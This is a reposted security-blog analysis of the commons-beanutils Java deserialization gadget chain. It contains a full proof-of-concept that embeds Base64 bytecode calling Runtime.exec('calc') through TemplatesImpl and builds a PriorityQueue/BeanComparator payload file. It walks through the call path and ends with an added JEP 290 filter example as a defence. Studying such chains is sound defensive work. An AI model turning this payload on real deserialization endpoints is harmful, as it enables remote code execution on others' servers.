Java security: analysis of the commons-beanutils gadget chain

admin, 5 May 2022 14:35:39, Code Audit

```java
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.Base64;
import java.util.PriorityQueue;
import javax.xml.transform.TransformerConfigurationException;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

// Class wrapper and imports added so the post's snippet compiles; the members are as the post shows them.
public class CBChain {

    // Base64 of the compiled EvilTest class the post embeds; the whitespace inside the literal is
    // line-wrapping from the page and must be removed before Base64.getDecoder() will accept it.
    public static byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9y bQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2Fw YWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5l TnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwv eHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNv bS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEA Bjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMM AB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUv QWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xl dEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUB ABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1By b2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEA DAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg== ");

    // Reflectively set a private field on any object.
    public static void SetFieldValue(Object obj, String fieldName, Object value)
            throws NoSuchFieldException, IllegalAccessException {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException,
            TransformerConfigurationException, InvocationTargetException, NoSuchMethodException,
            IOException, ClassNotFoundException {
        // TemplatesImpl carrying the bytecode; the same object as in CC3
        TemplatesImpl obj = new TemplatesImpl();
        SetFieldValue(obj, "_bytecodes", new byte[][]{bytes});
        SetFieldValue(obj, "_name", "HelloTemplatesImpl");
        SetFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // CB chain
        BeanComparator comparator = new BeanComparator();

        // CC2: PriorityQueue whose readObject() ends up calling comparator.compare()
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add("1");
        queue.add("2");
        SetFieldValue(comparator, "property", "outputProperties");
        SetFieldValue(queue, "queue", new Object[]{obj, obj});

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("CBShiro.bin"));
        objectOutputStream.writeObject(queue);
        objectOutputStream.close();

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("CBShiro.bin"));
        objectInputStream.readObject();
        objectInputStream.close();
    }
}
```


At line 52 of BeanComparator#compare you can see that it calls the getter named by `property` on the o1 object:

```java
Object value1 = PropertyUtils.getProperty(o1, this.property);
```


PropertyUtils.getProperty() lets the caller invoke the getter of any JavaBean directly; a JavaBean is simply a Java class that follows a particular convention.
Here the first half of CC3 is used for the test. CC3 reaches command execution directly through newTransformer, and one level above newTransformer there is getOutputProperties:

TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

As you can see, once outputProperties is passed in as the property name, the command is executed.


BeanComparator#compare has now been analysed above. All that remains is to find which readObject ends up calling that compare.

```java
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
queue.add("1");
queue.add("2");
SetFieldValue(comparator, "property", "outputProperties");
SetFieldValue(queue, "queue", new Object[]{obj, obj});
```

That readObject is PriorityQueue#readObject.


Step into heapify().


Continue into siftDown().


This comparator is the same comparator that was supplied when the queue was first constructed.



And SetFieldValue(queue, "queue", new Object[]{obj, obj}); replaces the queue's contents with the TemplatesImpl instances; during this process the element taken from queue is assigned to x.


At this point the analysis is complete: this is a clean command execution.
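The chain only fires because PriorityQueue#readObject resolves the attacker-supplied comparator and element classes and then calls compare(); a JEP 290 deserialization filter refuses those class descriptors before that point. The following is an added example and not code from the post; the class, field and method names (CbChainFilterDemo, FILTER, readFiltered, serialize) are my own, and it assumes JDK 9 or later.

```java
import java.io.*;
import java.util.PriorityQueue;

// Added example (not from the original post); the names here are mine.
public final class CbChainFilterDemo {
    // JEP 290 filter. The two "!" patterns name the gadget classes of the chain; the
    // trailing "!*" makes every class not listed an error, and that is the part that
    // actually holds: no comparator or element class outside the list is ever resolved,
    // so PriorityQueue#readObject never reaches heapify() -> siftDown() -> compare().
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "!org.apache.commons.beanutils.**;"
          + "!com.sun.org.apache.xalan.internal.xsltc.trax.**;"
          + "maxdepth=8;"
          + "java.util.PriorityQueue;java.lang.String;!*");

    // Deserialize with the filter installed on this one stream.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // A queue of strings, the shape the PoC above starts from, round-trips fine.
        PriorityQueue<Object> ok = new PriorityQueue<>();
        ok.add("1");
        ok.add("2");
        System.out.println("allowed: " + readFiltered(serialize(ok)));

        // Any element class outside the list is refused while its class descriptor is
        // read, before heapify() can run. The post's payload fails even earlier, when
        // the BeanComparator in the comparator field is encountered.
        PriorityQueue<Object> odd = new PriorityQueue<>();
        odd.add(42);   // java.lang.Integer is not on the list
        try {
            readFiltered(serialize(odd));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```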






This article was originally published on the WeChat public account moonsec: Java security: analysis of the commons-beanutils gadget chain

Reproduction should keep the link to this article (CN-SEC Chinese site; thanks to the original author for their work): Java security: analysis of the commons-beanutils gadget chain, http://cn-sec.com/archives/974317.html